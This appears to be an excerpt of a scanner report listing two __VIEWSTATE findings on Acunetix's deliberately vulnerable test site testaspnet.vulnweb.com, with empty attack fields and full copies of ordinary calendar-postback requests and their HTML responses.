URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8260&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBA%2B8O%2BfNoIZGRkZXPxN1G31ZhxWThayRTY%2FekanCU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQrv%2B2BgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DqoEKqM03ZVzcpjNOAH%2BiTBWP%2F7s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:56 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBA+8O+fNoIZGRkZXPxN1G31ZhxWThayRTY/ekanCU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQrv+2BgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DqoEKqM03ZVzcpjNOAH+iTBWP/7s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:White" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8248&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBABsdQc9oIZGRkPtt9p%2F%2BtjPDy%2F%2FqCdpacPfkXNIo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU3a3DBwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DOoigO68ylgbZpF0m73TCs0EmeCw%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:18 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBABsdQc9oIZGRkPtt9p/+tjPDy//qCdpacPfkXNIo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU3a3DBwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DOoigO68ylgbZpF0m73TCs0EmeCw=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:White" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their 